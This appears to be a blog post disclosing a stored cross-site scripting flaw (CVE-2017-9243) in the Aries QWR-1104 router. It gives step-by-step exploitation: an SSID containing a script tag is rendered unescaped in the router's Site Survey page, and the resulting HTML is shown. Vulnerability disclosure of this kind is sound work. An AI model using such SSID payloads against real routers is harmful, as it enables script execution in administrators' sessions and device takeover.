Skip to content

QWR-1104 Wireless-N Router-XSS(CVE-2017-9243)

Aries QWR-1104 Wireless-N Router this is home based router. this router provide some extra feature like WDS, Brigeding etc. while connectting another network admin must monitor network around using Site servey page which is vulnerable to Execute malicious JavaScript code remoting in Wireless Site Survey page

##### Video PoC and Blog Post #####

##### POC #######

Make a Hotspot using any device. In Hotspot’s Accss point name field, Put your malicious javascript code as a name of you hotspot.

When Target Router’s monitors routers around. your Malicious hotspot named router log in target’s Site survey page and your hotspot javascript code executed as a javascript.(make sure doing this you whitin a target’s network range.)

 

 

my Hotspot’s name : t<script>prompt(2)</script>

Target Servey page After Execute my Javascript ##Below##

<tr><td bgcolor=”#C0C0C0″ align=”center” width=”20%”><pre><font size=”2″>t<script>prompt(2)</script></font></pre></td>
<td bgcolor=”#C0C0C0″ align=”center” width=”20%”><font size=”2″>02:1a:11:f8:**:**</font></td>
<td bgcolor=”#C0C0C0″ align=”center” width=”10%”><font size=”2″>11 (B+G+N)</font></td>
<td bgcolor=”#C0C0C0″ align=”center” width=”20%”><font size=”2″>AP</font></td>
<td bgcolor=”#C0C0C0″ align=”center” width=”10%”><font size=”2″>no</font></td>
<td bgcolor=”#C0C0C0″ align=”center” width=”10%”><font size=”2″>38</font></td>
</tr>

Published inPoC

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *